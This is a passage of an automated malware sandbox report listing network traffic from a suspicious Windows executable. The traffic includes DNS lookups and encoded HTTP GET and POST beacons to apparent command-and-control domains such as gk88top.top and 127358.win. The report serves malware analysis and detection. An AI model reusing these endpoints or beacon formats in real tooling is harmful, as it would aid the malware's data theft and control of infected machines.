                                                    Dec 13, 2024 13:08:03.056107044 CET8049918206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:03.056720972 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:03.954096079 CET4992480192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:04.073925018 CET8049924206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:04.074079037 CET4992480192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:04.086200953 CET4992480192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:04.206757069 CET8049924206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:05.631333113 CET8049924206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:05.631572962 CET8049924206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:05.631633997 CET4992480192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:05.633819103 CET4992480192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:05.755373955 CET8049924206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:11.354545116 CET4994180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:11.474343061 CET804994166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:11.474438906 CET4994180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:11.486176968 CET4994180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:11.606041908 CET804994166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:12.719862938 CET804994166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:12.721487999 CET804994166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:12.721564054 CET4994180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:12.998493910 CET4994180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:14.019423008 CET4994880192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:14.139127016 CET804994866.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:14.139266014 CET4994880192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:14.151283979 CET4994880192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:14.270999908 CET804994866.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:15.375128031 CET804994866.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:15.375247955 CET804994866.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:15.375502110 CET4994880192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:15.655529976 CET4994880192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:16.677755117 CET4995580192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:16.798520088 CET804995566.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:16.798608065 CET4995580192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:16.825684071 CET4995580192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:16.947514057 CET804995566.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:16.947530985 CET804995566.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:18.034415007 CET804995566.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:18.034531116 CET804995566.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:18.034708023 CET4995580192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:18.342223883 CET4995580192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:19.363480091 CET4996180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:19.483248949 CET804996166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:19.483414888 CET4996180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:19.564925909 CET4996180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:19.684798956 CET804996166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:20.715131044 CET804996166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:20.715379000 CET804996166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:20.715431929 CET4996180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:20.717715979 CET4996180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:20.838345051 CET804996166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:26.434437990 CET4997880192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:26.554311991 CET8049978217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:26.554409027 CET4997880192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:26.568495035 CET4997880192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:26.688291073 CET8049978217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:27.793652058 CET8049978217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:27.793677092 CET8049978217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:27.793768883 CET4997880192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:28.082812071 CET4997880192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:29.095309019 CET4998580192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:29.215143919 CET8049985217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:29.215290070 CET4998580192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:29.229239941 CET4998580192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:29.350004911 CET8049985217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:30.458702087 CET8049985217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:30.458834887 CET8049985217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:30.458874941 CET4998580192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:30.733081102 CET4998580192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:32.333926916 CET4998980192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:32.454036951 CET8049989217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:32.454140902 CET4998980192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:32.466933012 CET4998980192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:32.586833000 CET8049989217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:32.586901903 CET8049989217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:33.827815056 CET8049989217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:33.827867985 CET8049989217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:33.827965975 CET4998980192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:33.982942104 CET4998980192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:35.002242088 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:35.122323036 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:35.123075962 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:35.131360054 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:35.251203060 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:36.422768116 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:36.422811985 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:36.422833920 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:36.422889948 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:36.422986031 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:36.422986031 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:36.426814079 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:36.546581984 CET8049990217.70.184.50192.168.2.7

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 13, 2024 13:07:21.055763006 CET5984353192.168.2.71.1.1.1
                                                    Dec 13, 2024 13:07:21.599163055 CET53598431.1.1.1192.168.2.7
                                                    Dec 13, 2024 13:07:38.320802927 CET6311653192.168.2.71.1.1.1
                                                    Dec 13, 2024 13:07:38.652786970 CET53631161.1.1.1192.168.2.7
                                                    Dec 13, 2024 13:07:54.367074966 CET6084453192.168.2.71.1.1.1
                                                    Dec 13, 2024 13:07:55.373620033 CET6084453192.168.2.71.1.1.1
                                                    Dec 13, 2024 13:07:55.978214025 CET53608441.1.1.1192.168.2.7
                                                    Dec 13, 2024 13:07:55.978249073 CET53608441.1.1.1192.168.2.7
                                                    Dec 13, 2024 13:08:10.642019987 CET5855753192.168.2.71.1.1.1
                                                    Dec 13, 2024 13:08:11.352205992 CET53585571.1.1.1192.168.2.7
                                                    Dec 13, 2024 13:08:25.736351013 CET5967553192.168.2.71.1.1.1
                                                    Dec 13, 2024 13:08:26.431775093 CET53596751.1.1.1192.168.2.7

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 13, 2024 13:07:21.055763006 CET192.168.2.71.1.1.10x250fStandard query (0)www.qqa79.topA (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:07:38.320802927 CET192.168.2.71.1.1.10xff97Standard query (0)www.gk88top.topA (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:07:54.367074966 CET192.168.2.71.1.1.10xf275Standard query (0)www.127358.winA (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:07:55.373620033 CET192.168.2.71.1.1.10xf275Standard query (0)www.127358.winA (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:08:10.642019987 CET192.168.2.71.1.1.10x84Standard query (0)www.infohive.websiteA (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:08:25.736351013 CET192.168.2.71.1.1.10x1400Standard query (0)www.sunnyz.storeA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 13, 2024 13:07:21.599163055 CET1.1.1.1192.168.2.70x250fNo error (0)www.qqa79.topqqa79.topCNAME (Canonical name)IN (0x0001)false
                                                    Dec 13, 2024 13:07:21.599163055 CET1.1.1.1192.168.2.70x250fNo error (0)qqa79.top38.47.233.21A (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:07:38.652786970 CET1.1.1.1192.168.2.70xff97No error (0)www.gk88top.top172.67.137.47A (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:07:38.652786970 CET1.1.1.1192.168.2.70xff97No error (0)www.gk88top.top104.21.7.187A (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:07:55.978214025 CET1.1.1.1192.168.2.70xf275No error (0)www.127358.win206.238.89.119A (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:07:55.978249073 CET1.1.1.1192.168.2.70xf275No error (0)www.127358.win206.238.89.119A (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:08:11.352205992 CET1.1.1.1192.168.2.70x84No error (0)www.infohive.website66.29.149.46A (IP address)IN (0x0001)false
                                                    Dec 13, 2024 13:08:26.431775093 CET1.1.1.1192.168.2.70x1400No error (0)www.sunnyz.storewebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                    Dec 13, 2024 13:08:26.431775093 CET1.1.1.1192.168.2.70x1400No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.qqa79.top
                                                    • www.gk88top.top
                                                    • www.127358.win
                                                    • www.infohive.website
                                                    • www.sunnyz.store

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.74982238.47.233.21806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:07:21.733755112 CET596OUTGET /t67p/?UZkt_p=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK5swGMfjJNS9OKmwWbAAHFg65wmu/s0j5u+YMxZCZuR1sUVf7BfBaxXx&Er=qt9d5V HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.qqa79.top
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Dec 13, 2024 13:07:23.265644073 CET691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:07:22 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.749858172.67.137.47806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:07:38.787792921 CET862OUTPOST /vjnn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.gk88top.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 219
                                                    Cache-Control: no-cache
                                                    Origin: http://www.gk88top.top
                                                    Referer: http://www.gk88top.top/vjnn/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 72 5a 38 42 43 56 53 55 75 6a 67 36 65 6c 6e 43 69 71 55 6f 45 33 77 2f 4b 2f 56 31 77 73 54 4c 6f 6c 74 77 56 45 78 48 72 4d 51 47 50 54 70 4e 51 3d 3d
                                                    Data Ascii: UZkt_p=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeurZ8BCVSUujg6elnCiqUoE3w/K/V1wsTLoltwVExHrMQGPTpNQ==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.749868172.67.137.47806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:07:41.447828054 CET882OUTPOST /vjnn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.gk88top.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 239
                                                    Cache-Control: no-cache
                                                    Origin: http://www.gk88top.top
                                                    Referer: http://www.gk88top.top/vjnn/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 76 52 2f 35 70 39 4e 45 74 6f 77 76 64 57 6c 49 6f 70 70 62 37 5a 78 79 30 76 63 57 56 39 77 63 53 2f 41 70 32 32 44 4d 38 73 32 46 68 37 67 68 52 54 72 4d 50 4b 46 68 55 56 7a 62 62 68 41 5a 69 72 77 75 47 62 30 72 4a 6e 69 65 4e 54 43 4b 42 4f 52 6d 75 32 55 62 42 33 54 50 4e 33 4c 72 30 58 37 78 71 44 75 33 6c 42 6e 36 67 6b 4c 64 53 79 75 35 2b 49 30 4c 39 7a 59 68 42 4e 56 5a 37 33 2f 6f 6b 46 59 41 6d 34 32 56 50 4c 37 49 62 6a 69 57 78 6d 4a 70 68 31 39 33 77 51 59 63 70 36 4c 64 79 74 62 67 79 30 41 47 2b 78 74 2f 4c 65 70 44 4c 36 76 46 4e 76 2b 64 41 3d
                                                    Data Ascii: UZkt_p=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxvR/5p9NEtowvdWlIoppb7Zxy0vcWV9wcS/Ap22DM8s2Fh7ghRTrMPKFhUVzbbhAZirwuGb0rJnieNTCKBORmu2UbB3TPN3Lr0X7xqDu3lBn6gkLdSyu5+I0L9zYhBNVZ73/okFYAm42VPL7IbjiWxmJph193wQYcp6Ldytbgy0AG+xt/LepDL6vFNv+dA=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.749874172.67.137.47806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:07:44.101985931 CET1895OUTPOST /vjnn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.gk88top.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1251
                                                    Cache-Control: no-cache
                                                    Origin: http://www.gk88top.top
                                                    Referer: http://www.gk88top.top/vjnn/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 6e 52 2f 71 52 39 4f 69 6c 6f 69 2f 64 57 35 59 6f 53 70 62 37 59 78 78 45 72 63 57 5a 48 77 66 71 2f 41 4c 4f 32 42 35 63 73 38 46 68 37 6f 42 52 51 6d 73 50 6c 46 68 45 4a 7a 61 33 68 41 5a 69 72 77 75 71 62 39 5a 78 6e 78 4f 4e 51 56 36 42 61 56 6d 75 53 55 62 5a 6e 54 50 5a 4e 4c 61 55 58 38 52 61 44 72 45 42 42 6c 61 68 43 4f 64 54 79 75 35 7a 57 30 4c 67 43 59 69 64 7a 56 65 66 33 2b 4e 30 47 41 30 53 50 69 6c 48 73 78 62 37 76 71 33 42 31 41 76 31 72 37 67 41 75 47 39 6f 62 54 4f 57 77 58 31 76 47 58 67 79 54 74 65 4b 4c 74 32 43 50 7a 48 4a 59 36 62 45 45 61 2f 49 65 43 76 78 69 61 31 59 55 46 45 4a 70 45 64 6c 4c 59 4f 6e 36 47 36 30 59 4c 76 68 54 76 33 56 61 75 67 62 55 46 6e 6d 50 67 70 6d 66 53 55 47 2b 41 61 41 69 79 58 7a 63 54 4c 34 63 73 6a 54 44 31 46 50 4c 32 32 6c 4b 77 55 37 43 6c 48 73 58 43 45 58 32 42 31 68 47 4a 35 64 77 67 46 57 [TRUNCATED]
                                                    Data Ascii: UZkt_p=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxnR/qR9Oiloi/dW5YoSpb7YxxErcWZHwfq/ALO2B5cs8Fh7oBRQmsPlFhEJza3hAZirwuqb9ZxnxONQV6BaVmuSUbZnTPZNLaUX8RaDrEBBlahCOdTyu5zW0LgCYidzVef3+N0GA0SPilHsxb7vq3B1Av1r7gAuG9obTOWwX1vGXgyTteKLt2CPzHJY6bEEa/IeCvxia1YUFEJpEdlLYOn6G60YLvhTv3VaugbUFnmPgpmfSUG+AaAiyXzcTL4csjTD1FPL22lKwU7ClHsXCEX2B1hGJ5dwgFWjFMnt2iPE9YxRvvDQZkhUb+B/V/4eLA7IhrgFQ5bLCgTm+8TC4z7Mn7XVpCfnjsJ9xIMJB+a1o4C6YUnuy9ru/XTZZsFkOTw4AuESIVPWIb6AXkYQSXmAH2BA36nKDaS047jPGmuW+TZI61YFb7P4S0eibrqiEL8T2rtp4VOzNNkI901h/5NedtugB+GhRncyXTdZnhRHV+l6mWFlF6TBfITKzKvKncJVVwBocBQhRfe5pA7AnYEZFN3p7VQ10Rkuymv63hG2bOIL9PZUz8E3Hle76c5is+IIeDX250O/Oyt6fRffyYtZbSa/D57Q98bfXWjXUBIVYwdEId14XeoxNfo+D3MGXkhqFUSB7xot1SznpjliJVTyTOw6Z9Cy/zEvVByR780dvW2k5QgvHzgIGVUYWTZ47XJ4VPD+WtTZbJ/Cl6L6d8sCSam0+88AqH6YokPZn0BR5rscONoH1c5AAsJxywF21ibTcb7LReMyHuOYBSRoeXSuH6Ek7Gv1Xc9D85/NIQyCAwT6ys+fqlbTOKkT+XE5lPKKjQ7egdnXRonnJl9lXMrGtlrlVmQ6XkCitHSJtgITZYoB2JnLI/N+MqYFsHo373VuCcFhx171lSjF/NBrMRUJ2KovFeAKMr5pA4nywskWs0F2Me0hiBZOpwxQcIa88GXBr [TRUNCATED]
                                                    Dec 13, 2024 13:07:45.726150036 CET1236INHTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:07:45 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uMcLC2ORiWh7piRBirqeAFWQkZ8SryRH366t50yY%2FP7Wpk1QZ%2BVre4YDwPv7cKODQaGo%2Fz3%2FpbjqYgWeV%2FqLYEYxJf89XDYTKlK6kUU2tn5V3OU%2BVcqsv7aOfDRPaZ5IRbw%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f15d5ea5cd078e7-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2069&rtt_var=1034&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1895&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 [TRUNCATED]
                                                    Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZb
                                                    Dec 13, 2024 13:07:45.726161003 CET87INData Raw: a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00
                                                    Data Ascii: N`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.749880172.67.137.47806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:07:46.753331900 CET598OUTGET /vjnn/?UZkt_p=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2FtKgHUwtP7LZToi+NLiM5u8oda1xOl7pN9QCYN1UR2qYINqcP5uKuM1&Er=qt9d5V HTTP/1.1
